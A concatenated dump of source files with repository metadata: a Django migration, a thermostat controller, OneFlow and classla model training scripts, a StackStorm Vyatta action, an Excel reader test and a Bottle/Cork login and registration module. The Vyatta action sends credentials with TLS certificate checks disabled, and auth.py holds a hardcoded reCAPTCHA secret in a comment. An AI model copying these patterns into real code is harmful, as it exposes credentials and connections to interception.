] | 1 | 2018-09-22T21:08:38.000Z | 2018-09-22T21:08:38.000Z | mainapp/migrations/0002_request_dateadded.py | reyasmohammed/rescuekerala | 68ee6cd4ea7b94e04fd32c4d488bcd7a8f2d371c | [
"MIT"
] | 1 | 2018-08-18T12:00:29.000Z | 2018-08-18T12:00:29.000Z | mainapp/migrations/0002_request_dateadded.py | reyasmohammed/rescuekerala | 68ee6cd4ea7b94e04fd32c4d488bcd7a8f2d371c | [
"MIT"
] | 5 | 2019-11-07T11:34:56.000Z | 2019-11-07T11:36:00.000Z | # Generated by Django 2.1 on 2018-08-11 09:32
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='request',
name='dateadded',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
]
| 23 | 93 | 0.6294 |
4e27a288bc09805b358343501fbdd23ed7fa2e48 | 1,216 | py | Python | src/main.py | danwwagner/repurposed-thermostats | 6d63393e1754175893a0c920aca22e0966277015 | [
"MIT"
] | null | null | null | src/main.py | danwwagner/repurposed-thermostats | 6d63393e1754175893a0c920aca22e0966277015 | [
"MIT"
] | null | null | null | src/main.py | danwwagner/repurposed-thermostats | 6d63393e1754175893a0c920aca22e0966277015 | [
"MIT"
] | null | null | null | from controlcontroller import ControlController
import glob
import os
# (1) Change sensor type here
from sensor import MCP9808
# (2) Change sensor type here
# List representation for use if the system will
# contain multiple types of temperature sensors.
# Signify the temperature sensor that will
# not be averaged as an indoor reading
# This may be different on each system
# due to inconsistent naming/numbering.
excluded_sensor = "1d"
# List of reserved i2c addresses
# that are used by components
# other than temperature sensors.
# Make sure that each of the elements
# in this list are hexadecimal strings
# i.e. "1a".
reserved = ["68"]
# You must include a Python implementation that
# uses the Sensor superclass for the
# type of sensor in your system (see sensor.py)
sensor = [MCP9808(reserved, excluded_sensor)]
# Find the USB folder in the mount point
path = "/media/pi/*"
list_of_usb_names = glob.glob(path)
if not list_of_usb_names:
    # Bug fix: the fallback directory used to be assigned to an unused
    # `directory` variable, so with no USB stick mounted the sensor-file list
    # below came out empty. Fall back to logging on the local SD card instead.
    list_of_usb_names = ["/home/pi/repurposed-thermostats/src"]
# One CSV log path per mounted location. (`usb_dir` avoids shadowing the
# builtin `dir` that the original comprehension used.)
path = [usb_dir + "/R1G4sensors.csv" for usb_dir in list_of_usb_names]
# Initialize the controller program
tent_control = ControlController(path, sensor)
# Enter the main control loop
tent_control.main()
| 25.87234 | 63 | 0.761513 |
cabe1b5a299524ea61f815b60a4176bd96d9e707 | 4,439 | py | Python | inception_v3/train.py | littlefisherfisher/models | 11fd89c0b45853e2ca99b86bf1638d5e8fbd9d34 | [
"Apache-2.0"
] | null | null | null | inception_v3/train.py | littlefisherfisher/models | 11fd89c0b45853e2ca99b86bf1638d5e8fbd9d34 | [
"Apache-2.0"
] | null | null | null | inception_v3/train.py | littlefisherfisher/models | 11fd89c0b45853e2ca99b86bf1638d5e8fbd9d34 | [
"Apache-2.0"
] | null | null | null | import oneflow.experimental as flow
import argparse
import numpy as np
import os
import time
from models.inceptionv3 import inception_v3
from utils.ofrecord_data_utils import OFRecordDataLoader
def _parse_args():
parser = argparse.ArgumentParser("flags for train inceptionv3")
parser.add_argument(
"--save_checkpoint_path",
type=str,
default="./checkpoints",
help="save checkpoint root dir",
)
parser.add_argument(
"--load_checkpoint", type=str, default="", help="load checkpoint"
)
parser.add_argument(
"--ofrecord_path", type=str, default="./ofrecord", help="dataset path"
)
# training hyper-parameters
parser.add_argument(
"--learning_rate", type=float, default=0.001, help="learning rate"
)
parser.add_argument("--mom", type=float, default=0.9, help="momentum")
parser.add_argument("--epochs", type=int, default=100, help="training epochs")
parser.add_argument(
"--train_batch_size", type=int, default=32, help="train batch size"
)
parser.add_argument("--val_batch_size", type=int, default=32, help="val batch size")
return parser.parse_args()
def main(args):
flow.enable_eager_execution()
flow.InitEagerGlobalSession()
train_data_loader = OFRecordDataLoader(
ofrecord_root=args.ofrecord_path,
mode="train",
dataset_size=9469,
batch_size=args.train_batch_size,
)
val_data_loader = OFRecordDataLoader(
ofrecord_root=args.ofrecord_path,
mode="val",
dataset_size=3925,
batch_size=args.val_batch_size,
)
# oneflow init
start_t = time.time()
inceptionv3_module = inception_v3()
if args.load_checkpoint != "":
print("load_checkpoint >>>>>>>>> ", args.load_checkpoint)
inceptionv3_module.load_state_dict(flow.load(args.load_checkpoint))
end_t = time.time()
print("init time : {}".format(end_t - start_t))
of_cross_entropy = flow.nn.CrossEntropyLoss()
inceptionv3_module.to("cuda")
of_cross_entropy.to("cuda")
of_sgd = flow.optim.SGD(
inceptionv3_module.parameters(), lr=args.learning_rate, momentum=args.mom
)
of_losses = []
all_samples = len(val_data_loader) * args.val_batch_size
print_interval = 100
for epoch in range(args.epochs):
inceptionv3_module.train()
for b in range(len(train_data_loader)):
image, label = train_data_loader.get_batch()
# oneflow train
start_t = time.time()
image = image.to("cuda")
label = label.to("cuda")
logits, aux = inceptionv3_module(image)
loss = of_cross_entropy(logits, label) + of_cross_entropy(aux, label)
loss.backward()
of_sgd.step()
of_sgd.zero_grad()
end_t = time.time()
if b % print_interval == 0:
l = loss.numpy()[0]
of_losses.append(l)
print(
"epoch {} train iter {} oneflow loss {}, train time : {}".format(
epoch, b, l, end_t - start_t
)
)
print("epoch %d train done, start validation" % epoch)
inceptionv3_module.eval()
correct_of = 0.0
for b in range(len(val_data_loader)):
image, label = val_data_loader.get_batch()
start_t = time.time()
image = image.to("cuda")
with flow.no_grad():
logits, aux = inceptionv3_module(image)
predictions = logits.softmax()
of_predictions = predictions.numpy()
clsidxs = np.argmax(of_predictions, axis=1)
label_nd = label.numpy()
for i in range(args.val_batch_size):
if clsidxs[i] == label_nd[i]:
correct_of += 1
end_t = time.time()
print("epoch %d, oneflow top1 val acc: %f" % (epoch, correct_of / all_samples))
flow.save(
inceptionv3_module.state_dict(),
os.path.join(
args.save_checkpoint_path,
"epoch_%d_val_acc_%f" % (epoch, correct_of / all_samples),
),
)
writer = open("of_losses.txt", "w")
for o in of_losses:
writer.write("%f\n" % o)
writer.close()
if __name__ == "__main__":
args = _parse_args()
main(args)
| 30.613793 | 88 | 0.596756 |
c8d9822bead3281f14c60ff578d4f7e16ee8f80a | 1,502 | py | Python | actions/0_start_cfg.py | StackStorm-Exchange/vyatta | a1b16e425da29e279744bdcbff422d7f481b2424 | [
"Apache-2.0"
] | 3 | 2018-11-20T17:08:00.000Z | 2021-12-13T17:56:16.000Z | actions/0_start_cfg.py | StackStorm-Exchange/vyatta | a1b16e425da29e279744bdcbff422d7f481b2424 | [
"Apache-2.0"
] | 4 | 2017-05-03T16:56:28.000Z | 2021-02-10T21:53:40.000Z | actions/0_start_cfg.py | StackStorm-Exchange/vyatta | a1b16e425da29e279744bdcbff422d7f481b2424 | [
"Apache-2.0"
] | 3 | 2017-05-03T16:06:57.000Z | 2021-01-28T17:48:22.000Z | import requests
import warnings
from st2client.client import Client
from st2common.runners.base_action import Action
class sstartCfg(Action):
def run(self, deviceIP):
# Fetching device credentials based on keys derived from deviceIP
#################################################################
user_key_name = deviceIP + "_user"
pswd_key_name = deviceIP + "_pswd"
client = Client()
try:
user = (client.keys.get_by_name(user_key_name)).value
pswd = (client.keys.get_by_name(pswd_key_name)).value
except Exception:
return (False, "No credentials for : " + deviceIP)
# Preapring the URL request(s)
#################################################################
h = {
"accept": "application/json",
"content-length": "0"
}
url_base = "https://" + deviceIP
url = url_base + "/rest/conf/"
# Sending the URL call(s)
#################################################################
with warnings.catch_warnings():
warnings.simplefilter("ignore")
r = requests.post(url, auth=(user, pswd), headers=h, verify=False)
if r.status_code == 201:
cmd_path = r.headers["Location"]
cmd_path = cmd_path[0:26]
cmd_path = str(cmd_path)
print(cmd_path[0:26])
else:
return (False, "Failed!")
| 34.930233 | 78 | 0.486019 |
26c879f188c56ff6fd2e6ba7ccdf1710b640a4fa | 830 | py | Python | src/test/python/excel/test_excel_reader.py | photowey/pytest-dynamic-framework | 4e7b6d74594191006b50831d42e7aae21e154d56 | [
"Apache-2.0"
] | null | null | null | src/test/python/excel/test_excel_reader.py | photowey/pytest-dynamic-framework | 4e7b6d74594191006b50831d42e7aae21e154d56 | [
"Apache-2.0"
] | null | null | null | src/test/python/excel/test_excel_reader.py | photowey/pytest-dynamic-framework | 4e7b6d74594191006b50831d42e7aae21e154d56 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# ---------------------------------------------
# @file test_excel_reader.py
# @description test_excel_reader
# @author WcJun
# @date 2021/07/31
# ---------------------------------------------
import os
from src.main.python.excel.excel_reader import ExcelReader
class TestExcelReader:
def test_excel_reader(self):
current_path = os.path.abspath(os.path.dirname(__file__))
excel_path = os.path.abspath(os.path.join(current_path, '../../resources/test_excel.xlsx'))
excel_reader = ExcelReader(excel_path)
user_info = excel_reader.read_excel(sheet_name='test_excel')
for item in user_info:
assert len(item) == 4
assert item[0] == '王大锤'
assert item[1] == 2
assert item[2] == 9528
assert item[3] == ''
| 29.642857 | 99 | 0.56506 |
d8f4960084b7cf219088d60cf8c2a24a9d53500a | 12,203 | py | Python | classla/models/tagger.py | clarinsi/classla | 229148f3942ff3428741f4004b7d6643b8a4dc45 | [
"Apache-2.0"
] | 11 | 2021-03-06T07:48:15.000Z | 2022-03-03T13:39:49.000Z | classla/models/tagger.py | clarinsi/classla | 229148f3942ff3428741f4004b7d6643b8a4dc45 | [
"Apache-2.0"
] | 23 | 2021-03-12T13:17:17.000Z | 2022-02-14T08:56:53.000Z | classla/models/tagger.py | clarinsi/classla | 229148f3942ff3428741f4004b7d6643b8a4dc45 | [
"Apache-2.0"
] | 7 | 2021-04-04T15:04:27.000Z | 2022-02-20T17:33:39.000Z | """
Entry point for training and evaluating a POS/morphological features tagger.
This tagger uses highway BiLSTM layers with character and word-level representations, and biaffine classifiers
to produce consistant POS and UFeats predictions.
For details please refer to paper: https://nlp.stanford.edu/pubs/qi2018universal.pdf.
"""
import sys
import os
import shutil
import time
from datetime import datetime
import argparse
import numpy as np
import random
import torch
from torch import nn, optim
from classla.models.pos.data import DataLoader
from classla.models.pos.trainer import Trainer
from classla.models.pos import scorer
from classla.models.common import utils
from classla.models.common.pretrain import Pretrain
from classla.models.common.doc import *
from classla.utils.conll import CoNLL
from classla.models import _training_logging
def parse_args():
    """Build and parse the command-line arguments for the tagger.

    Returns:
        argparse.Namespace with all training/evaluation options.
    """

    def _str2bool(value):
        # Bug fix: argparse's ``type=bool`` treats ANY non-empty string
        # (including "False") as True. Parse the usual boolean spellings
        # explicitly so ``--cuda False`` actually disables CUDA.
        if isinstance(value, bool):
            return value
        if value.lower() in ('true', 't', 'yes', 'y', '1'):
            return True
        if value.lower() in ('false', 'f', 'no', 'n', '0'):
            return False
        raise argparse.ArgumentTypeError('Boolean value expected, got %r' % value)

    parser = argparse.ArgumentParser()
    # Paths and data files.
    parser.add_argument('--data_dir', type=str, default='data/pos', help='Root dir for saving models.')
    parser.add_argument('--wordvec_dir', type=str, default='extern_data/word2vec', help='Directory of word vectors.')
    parser.add_argument('--wordvec_file', type=str, default=None, help='Word vectors filename.')
    parser.add_argument('--train_file', type=str, default=None, help='Input file for data loader.')
    parser.add_argument('--eval_file', type=str, default=None, help='Input file for data loader.')
    parser.add_argument('--output_file', type=str, default=None, help='Output CoNLL-U file.')
    parser.add_argument('--gold_file', type=str, default=None, help='Output CoNLL-U file.')
    parser.add_argument('--pretrain_file', type=str, default=None, help='Input file containing pretrained data.')
    parser.add_argument('--use_lexicon', type=str, default=None, help="Input location of lemmatization model.")
    parser.add_argument('--mode', default='train', choices=['train', 'predict'])
    parser.add_argument('--lang', type=str, help='Language')
    parser.add_argument('--shorthand', type=str, help="Treebank shorthand")
    # Model architecture.
    parser.add_argument('--hidden_dim', type=int, default=200)
    parser.add_argument('--char_hidden_dim', type=int, default=400)
    parser.add_argument('--deep_biaff_hidden_dim', type=int, default=400)
    parser.add_argument('--composite_deep_biaff_hidden_dim', type=int, default=100)
    parser.add_argument('--word_emb_dim', type=int, default=75)
    parser.add_argument('--char_emb_dim', type=int, default=100)
    parser.add_argument('--tag_emb_dim', type=int, default=50)
    parser.add_argument('--transformed_dim', type=int, default=125)
    parser.add_argument('--num_layers', type=int, default=2)
    parser.add_argument('--char_num_layers', type=int, default=1)
    parser.add_argument('--pretrain_max_vocab', type=int, default=250000)
    parser.add_argument('--word_dropout', type=float, default=0.33)
    parser.add_argument('--dropout', type=float, default=0.5)
    parser.add_argument('--rec_dropout', type=float, default=0, help="Recurrent dropout")
    parser.add_argument('--char_rec_dropout', type=float, default=0, help="Recurrent dropout")
    parser.add_argument('--no_char', dest='char', action='store_false', help="Turn off character model.")
    parser.add_argument('--no_pretrain', dest='pretrain', action='store_false', help="Turn off pretrained embeddings.")
    parser.add_argument('--share_hid', action='store_true', help="Share hidden representations for UPOS, XPOS and UFeats.")
    parser.set_defaults(share_hid=False)
    # Optimization.
    parser.add_argument('--sample_train', type=float, default=1.0, help='Subsample training data.')
    parser.add_argument('--optim', type=str, default='adam', help='sgd, adagrad, adam or adamax.')
    parser.add_argument('--lr', type=float, default=3e-3, help='Learning rate')
    parser.add_argument('--beta2', type=float, default=0.95)
    parser.add_argument('--max_steps', type=int, default=50000)
    parser.add_argument('--eval_interval', type=int, default=100)
    parser.add_argument('--fix_eval_interval', dest='adapt_eval_interval', action='store_false', \
            help="Use fixed evaluation interval for all treebanks, otherwise by default the interval will be increased for larger treebanks.")
    parser.add_argument('--max_steps_before_stop', type=int, default=3000)
    parser.add_argument('--batch_size', type=int, default=5000)
    parser.add_argument('--max_grad_norm', type=float, default=1.0, help='Gradient clipping.')
    parser.add_argument('--log_step', type=int, default=20, help='Print log every k steps.')
    parser.add_argument('--save_dir', type=str, default='saved_models/pos', help='Root dir for saving models.')
    parser.add_argument('--save_name', type=str, default=None, help="File name to save the model")
    parser.add_argument('--seed', type=int, default=1234)
    # Device selection (``--cpu`` overrides ``--cuda`` in main()).
    parser.add_argument('--cuda', type=_str2bool, default=torch.cuda.is_available())
    parser.add_argument('--cpu', action='store_true', help='Ignore CUDA.')
    args = parser.parse_args()
    return args
def main():
    """CLI entry point: seed RNGs, resolve the device, and dispatch to train/evaluate."""
    sys.setrecursionlimit(50000)
    opts = parse_args()
    # Seed every RNG source for reproducibility.
    torch.manual_seed(opts.seed)
    np.random.seed(opts.seed)
    random.seed(opts.seed)
    # --cpu overrides CUDA; otherwise seed the CUDA generator as well.
    if opts.cpu:
        opts.cuda = False
    elif opts.cuda:
        torch.cuda.manual_seed(opts.seed)
    opts = vars(opts)
    print("Running tagger in {} mode".format(opts['mode']))
    runner = train if opts['mode'] == 'train' else evaluate
    runner(opts)
def train(args):
    """Train the POS/morphological tagger described by the ``args`` dict.

    Loads pretrained word vectors and CoNLL-U train/dev data, then runs the
    training loop with periodic dev-set evaluation, best-model checkpointing
    and an AMSGrad-based early-stopping scheme.
    """
    utils.ensure_dir(args['save_dir'])
    model_file = args['save_dir'] + '/' + args['save_name'] if args['save_name'] is not None \
            else '{}/{}_tagger.pt'.format(args['save_dir'], args['shorthand'])
    # load pretrained vectors
    vec_file = args['wordvec_file']
    pretrain_file = '{}/{}.pretrain.pt'.format(args['save_dir'], args['shorthand']) if args['pretrain_file'] is None \
        else args['pretrain_file']
    pretrain = Pretrain(pretrain_file, vec_file, args['pretrain_max_vocab'])
    # load data
    print("Loading data with batch size {}...".format(args['batch_size']))
    doc, metasentences = CoNLL.conll2dict(input_file=args['train_file'])
    train_doc = Document(doc, metasentences=metasentences)
    train_batch = DataLoader(train_doc, args['batch_size'], args, pretrain, evaluation=False)
    # the dev loader reuses the vocabulary built from the training data
    vocab = train_batch.vocab
    doc, metasentences = CoNLL.conll2dict(input_file=args['eval_file'])
    dev_doc = Document(doc, metasentences=metasentences)
    dev_batch = DataLoader(dev_doc, args['batch_size'], args, pretrain, vocab=vocab, evaluation=True, sort_during_eval=True)
    # pred and gold path
    system_pred_file = args['output_file']
    gold_file = args['gold_file']
    # skip training if the language does not have training or dev data
    if len(train_batch) == 0 or len(dev_batch) == 0:
        print("Skip training because no data available...")
        sys.exit(0)
    print("Training tagger...")
    trainer = Trainer(args=args, vocab=vocab, pretrain=pretrain, use_cuda=args['cuda'])
    global_step = 0
    max_steps = args['max_steps']
    dev_score_history = []
    best_dev_preds = []
    current_lr = args['lr']
    global_start_time = time.time()
    format_str = '{}: step {}/{}, loss = {:.6f} ({:.3f} sec/batch), lr: {:.6f}'
    # optionally stretch the evaluation interval for larger treebanks
    if args['adapt_eval_interval']:
        args['eval_interval'] = utils.get_adaptive_eval_interval(dev_batch.num_examples, 2000, args['eval_interval'])
        print("Evaluating the model every {} steps...".format(args['eval_interval']))
    using_amsgrad = False
    last_best_step = 0
    # start training
    train_loss = 0
    while True:
        do_break = False
        for i, batch in enumerate(train_batch):
            start_time = time.time()
            global_step += 1
            loss = trainer.update(batch, eval=False) # update step
            train_loss += loss
            if global_step % args['log_step'] == 0:
                duration = time.time() - start_time
                print(format_str.format(datetime.now().strftime("%Y-%m-%d %H:%M:%S"), global_step,\
                        max_steps, loss, duration, current_lr))
            if global_step % args['eval_interval'] == 0:
                # eval on dev
                print("Evaluating on dev set...")
                dev_preds = []
                for batch in dev_batch:
                    preds = trainer.predict(batch)
                    dev_preds += preds
                # restore the original sentence order before writing predictions
                dev_preds = utils.unsort(dev_preds, dev_batch.data_orig_idx)
                dev_batch.doc.set([UPOS, XPOS, FEATS], [y for x in dev_preds for y in x])
                CoNLL.dict2conll(dev_batch.doc.to_dict(), system_pred_file)
                _, _, dev_score = scorer.score(system_pred_file, gold_file)
                train_loss = train_loss / args['eval_interval'] # avg loss per batch
                print("step {}: train_loss = {:.6f}, dev_score = {:.4f}".format(global_step, train_loss, dev_score))
                train_loss = 0
                # save best model
                if len(dev_score_history) == 0 or dev_score > max(dev_score_history):
                    last_best_step = global_step
                    trainer.save(model_file)
                    print("new best model saved.")
                    best_dev_preds = dev_preds
                dev_score_history += [dev_score]
                print("")
            # early stopping: first switch the optimizer to AMSGrad once; if
            # there is still no improvement afterwards, stop for good
            if global_step - last_best_step >= args['max_steps_before_stop']:
                if not using_amsgrad:
                    print("Switching to AMSGrad")
                    last_best_step = global_step
                    using_amsgrad = True
                    trainer.optimizer = optim.Adam(trainer.model.parameters(), amsgrad=True, lr=args['lr'], betas=(.9, args['beta2']), eps=1e-6)
                else:
                    do_break = True
                    break
            if global_step >= args['max_steps']:
                do_break = True
                break
        if do_break: break
        train_batch.reshuffle()
    print("Training ended with {} steps.".format(global_step))
    best_f, best_eval = max(dev_score_history)*100, np.argmax(dev_score_history)+1
    print("Best dev F1 = {:.2f}, at iteration = {}".format(best_f, best_eval * args['eval_interval']))
def evaluate(args):
    """Evaluate a saved tagger model on ``args['eval_file']``.

    Writes predictions to ``args['output_file']`` in CoNLL-U format and, when
    a gold file is given, prints the scorer's accuracy.
    """
    # file paths
    system_pred_file = args['output_file']
    gold_file = args['gold_file']
    model_file = args['save_dir'] + '/' + args['save_name'] if args['save_name'] is not None \
            else '{}/{}_tagger.pt'.format(args['save_dir'], args['shorthand'])
    pretrain_file = '{}/{}.pretrain.pt'.format(args['save_dir'], args['shorthand']) if args['pretrain_file'] is None \
        else args['pretrain_file']
    pretrain = Pretrain(pretrain_file)
    # load model
    print("Loading model from: {}".format(model_file))
    use_cuda = args['cuda'] and not args['cpu']
    trainer = Trainer(args=args, pretrain=pretrain, model_file=model_file, use_cuda=use_cuda)
    loaded_args, vocab = trainer.args, trainer.vocab
    # load config
    # command-line paths/mode override the values stored with the model
    for k in args:
        if k.endswith('_dir') or k.endswith('_file') or k in ['shorthand'] or k == 'mode':
            loaded_args[k] = args[k]
    # load data
    print("Loading data with batch size {}...".format(args['batch_size']))
    doc, metasentences = CoNLL.conll2dict(input_file=args['eval_file'])
    doc = Document(doc, metasentences=metasentences)
    batch = DataLoader(doc, args['batch_size'], loaded_args, pretrain, vocab=vocab, evaluation=True, sort_during_eval=True)
    if len(batch) > 0:
        print("Start evaluation...")
        preds = []
        for i, b in enumerate(batch):
            preds += trainer.predict(b)
    else:
        # skip eval if dev data does not exist
        preds = []
    # restore the original sentence order before writing predictions
    preds = utils.unsort(preds, batch.data_orig_idx)
    # write to file and score
    batch.doc.set([UPOS, XPOS, FEATS], [y for x in preds for y in x])
    CoNLL.dict2conll(batch.doc.to_dict(), system_pred_file)
    if gold_file is not None:
        _, _, score = scorer.score(system_pred_file, gold_file)
        print("Tagger score:")
        print("{} {:.2f}".format(args['shorthand'], score*100))
# Script entry point.
if __name__ == '__main__':
    main()
| 45.533582 | 144 | 0.661559 |
a6b19d4a907ffc7765558217b57ee06b81b3d5d2 | 7,590 | py | Python | auth.py | deb17/regex | fc811a1e42380265986f374598308dc79a0eb88d | [
"MIT"
] | null | null | null | auth.py | deb17/regex | fc811a1e42380265986f374598308dc79a0eb88d | [
"MIT"
] | 1 | 2021-06-01T23:16:37.000Z | 2021-06-01T23:16:37.000Z | auth.py | deb17/regex | fc811a1e42380265986f374598308dc79a0eb88d | [
"MIT"
] | null | null | null | import os
import logging
import bottle
from cork import Cork
from bottle_flash2 import FlashPlugin
# import requests
DATABASE_URL = os.environ['DATABASE_URL']
DBNAME = DATABASE_URL.rsplit('/', 1)[1]
MAILID = os.environ['MAILID']
PASSWORD = os.environ['PASSWORD']
COOKIE_SECRET = os.environ['COOKIE_SECRET']
# SITE_VERIFY_URL = 'https://www.google.com/recaptcha/api/siteverify'
# RECAPTCHA_SECRET = '6LfeHx4UAAAAAFWXGh_xcL0B8vVcXnhn9q_SnQ1b'
logging.basicConfig(format='heroku - - [%(asctime)s] %(message)s',
level=logging.DEBUG)
from cork.backends import SqlAlchemyBackend
if not DATABASE_URL.startswith('postgresql'):
DATABASE_URL = 'postgresql:' + DATABASE_URL.split(':', 1)[1]
sa = SqlAlchemyBackend(DATABASE_URL,
initialize=True,
connect_args={'dbname': DBNAME})
SMTP_URL = ('starttls://' + MAILID + ':' + PASSWORD
+ '@smtp-mail.outlook.com:587')
aaa = Cork(smtp_url=SMTP_URL,
email_sender=MAILID,
backend=sa)
authorize = aaa.make_auth_decorator(fail_redirect="/login", role="user")
app = bottle.Bottle()
app.install(FlashPlugin(secret=COOKIE_SECRET))
def postd():
    """Return the parsed form data of the current POST request."""
    return bottle.request.forms
def post_get(name, default=''):
    """Return the named POST field, stripped of surrounding whitespace."""
    value = bottle.request.POST.get(name, default)
    return value.strip()
@bottle.route('/sorry_page')
def sorry_page():
    """Serve the not-authorized page."""
    message = '<p>Sorry, you are not authorized to perform this action</p>'
    return message
@bottle.route('/login')
@bottle.view('login_form')
def login_form():
    """Serve the login form, forcing HTTPS and skipping logged-in users."""
    # TLS terminates at the platform router; bounce plain-HTTP requests.
    if bottle.request.headers.get('X-Forwarded-Proto') == 'http':
        secure_url = 'https:' + bottle.request.url.split(':', 1)[1]
        return bottle.redirect(secure_url)
    if not aaa.user_is_anonymous:
        return bottle.redirect('/home')
    # Pull (and clear) any form state stashed by a previous failed submit.
    session = bottle.request.environ.get('beaker.session')
    stashed = {key: session.get(key, '') for key in ('form', 'uname', 'email')}
    for key, value in stashed.items():
        if value:
            del session[key]
    session.save()
    return {'app': app, 'form': stashed['form'], 'uname': stashed['uname'],
            'email': stashed['email']}
@bottle.post('/login')
def login():
    """Authenticate a user and redirect on success or failure."""
    username = post_get('username')
    password = post_get('password')
    session = bottle.request.environ.get('beaker.session')
    # Users who arrived with a pending pattern continue to /insert.
    target = '/insert' if session.get('pattern') else '/home'
    # Stash the username so the login form can be re-populated on failure.
    session['form'] = 'form1'
    session['uname'] = username
    session.save()
    aaa.login(username, password, success_redirect=target,
              fail_redirect='/temp')
@bottle.route('/temp')
def pass_msg():
    """Flash a login-failure message and return to the login form."""
    app.flash('Invalid username/password.')
    return bottle.redirect('/login')
@bottle.route('/user_is_anonymous')
def user_is_anonymous():
    """Report whether the current visitor is anonymous, as a string."""
    return 'True' if aaa.user_is_anonymous else 'False'
@bottle.route('/logout')
def logout():
    """End the current session and return to the landing page."""
    aaa.logout(success_redirect='/')
def save_form_fields(form, username, email):
    """Stash form state in the session so the login page can re-render it."""
    session = bottle.request.environ.get('beaker.session')
    for key, value in (('form', form), ('uname', username), ('email', email)):
        session[key] = value
    session.save()
@bottle.post('/register')
def register():
    """Validate sign-up input and send the registration email."""
    username = post_get('username')
    pass1 = post_get('password1')
    pass2 = post_get('password2')
    email = post_get('email_address')
    # NOTE: Google reCAPTCHA verification used to run here and is disabled.
    error = False
    if len(username) < 3:
        app.flash('Username must have at least 3 characters.')
        error = True
    if len(pass1) < 8:
        app.flash('Password must have at least 8 characters.')
        error = True
    if pass1 != pass2:
        app.flash("Passwords don't match.")
        error = True
    if error:
        # Keep the entered values so the form can be re-populated.
        save_form_fields('form2', username, email)
        return bottle.redirect('/login')
    try:
        aaa.register(username, pass1, email)
    except Exception as e:
        app.flash(str(e))
        save_form_fields('form2', username, email)
        return bottle.redirect('/login')
    return 'Please check your mailbox.'
@bottle.route('/validate_registration/<registration_code>')
def validate_registration(registration_code):
    """Validate a registration code and activate the user account."""
    try:
        aaa.validate_registration(registration_code)
    except Exception as e:
        # Invalid or expired code: log it but show a generic page.
        logging.warning(str(e))
        return ('<head><title>Register</title></head>'
                '<p>This link is invalid.</p>')
    return 'Thanks. <a href="/login">Go to login</a>'
@bottle.post('/reset_password')
def send_password_reset_email():
    """Kick off a password reset by emailing the user a reset link."""
    username = post_get('username')
    email = post_get('email_address')
    try:
        aaa.send_password_reset_email(username=username, email_addr=email)
    except Exception as e:
        app.flash(str(e))
        # Keep the entered values so the form can be re-populated.
        save_form_fields('form3', username, email)
        return bottle.redirect('/login')
    return 'Please check your mailbox.'
@bottle.route('/change_password/<reset_code>')
@bottle.view('password_change_form')
def change_password(reset_code):
    """Render the password change form for the given reset code."""
    return {'reset_code': reset_code, 'app': app}
@bottle.post('/change_password')
def change_password():
    """Apply a password reset submitted from the change-password form."""
    # NOTE(review): this def shadows the GET handler of the same name at
    # module level; both routes still work because bottle registered each
    # callback at decoration time.
    password = post_get('password')
    reset_code = post_get('reset_code')
    if len(password) < 8:
        app.flash('Password must have at least 8 characters.')
        return bottle.redirect('/change_password/' + reset_code)
    aaa.reset_password(reset_code, password)
    return ('<head><title>Change password</title></head>'
            'Thanks. <a href="/login">Go to login</a>')
# admin views follow
@bottle.route('/admin')
@authorize(role="admin", fail_redirect='/sorry_page')
@bottle.view('admin_page')
def admin():
    """Render the admin dashboard; restricted to the admin role."""
    return {
        'current_user': aaa.current_user,
        'users': aaa.list_users(),
        'roles': aaa.list_roles(),
    }
@bottle.post('/create_user')
def create_user():
    """Create a new user from the admin page (AJAX endpoint)."""
    try:
        aaa.create_user(postd().username, postd().role, postd().password)
    except Exception as e:
        return dict(ok=False, msg=str(e))
    return dict(ok=True, msg='')
@bottle.post('/delete_user')
def delete_user():
    """Delete a user from the admin page (AJAX endpoint).

    Returns a JSON-able dict with ``ok`` and an error message on failure.
    """
    try:
        aaa.delete_user(post_get('username'))
        return dict(ok=True, msg='')
    except Exception as e:
        # Log instead of print(): consistent with the logging used by the
        # rest of this module (see validate_registration).
        logging.warning(str(e))
        return dict(ok=False, msg=str(e))
@bottle.post('/create_role')
def create_role():
    """Create a new role from the admin page (AJAX endpoint)."""
    try:
        aaa.create_role(post_get('role'), post_get('level'))
    except Exception as e:
        return dict(ok=False, msg=str(e))
    return dict(ok=True, msg='')
@bottle.post('/delete_role')
def delete_role():
    """Delete a role from the admin page (AJAX endpoint)."""
    try:
        aaa.delete_role(post_get('role'))
    except Exception as e:
        return dict(ok=False, msg=str(e))
    return dict(ok=True, msg='')
8b80f590bb4b9c70fe8ec91f61a66dcc5010dc7c | 823 | py | Python | clustertop/__init__.py | rossdylan/clustertop | 996471bdfec956a2e12b723081c00fea91815bf2 | [
"MIT"
] | 2 | 2015-05-09T02:54:43.000Z | 2017-06-26T20:59:24.000Z | clustertop/__init__.py | rossdylan/clustertop | 996471bdfec956a2e12b723081c00fea91815bf2 | [
"MIT"
] | null | null | null | clustertop/__init__.py | rossdylan/clustertop | 996471bdfec956a2e12b723081c00fea91815bf2 | [
"MIT"
] | null | null | null | from clustertop.poller import Poller
from ConfigParser import ConfigParser
import argparse
import importlib
def main():
parser = argparse.ArgumentParser(
description='Control the cluster top backend')
parser.add_argument('command', choices=['check', 'run'])
parser.add_argument('--config', type=str, default='/etc/clustertop')
args = parser.parse_args()
cf = ConfigParser()
cf.read(args.config)
the_poller = Poller
if cf.has_option('main', 'poller'):
mod_path, cls = cf.get('main', 'poller').split(':')
module = importlib.import_module(mod_path)
the_poller = getattr(module, cls)
if args.command == 'run':
poller = the_poller(cf)
poller.poll_loop()
elif args.command == 'check':
poller = the_poller(cf)
poller.poll()
| 31.653846 | 72 | 0.654921 |
f8b5821c054b709898f5ad3da055fce69d97980e | 11,746 | py | Python | DeepRL_For_HPE/DatasetHandler/BiwiBrowser.py | muratcancicek/Deep_RL_For_Head_Pose_Est | b3436a61a44d20d8bcfd1341792e0533e3ff9fc2 | [
"Apache-2.0"
] | null | null | null | DeepRL_For_HPE/DatasetHandler/BiwiBrowser.py | muratcancicek/Deep_RL_For_Head_Pose_Est | b3436a61a44d20d8bcfd1341792e0533e3ff9fc2 | [
"Apache-2.0"
] | null | null | null | DeepRL_For_HPE/DatasetHandler/BiwiBrowser.py | muratcancicek/Deep_RL_For_Head_Pose_Est | b3436a61a44d20d8bcfd1341792e0533e3ff9fc2 | [
"Apache-2.0"
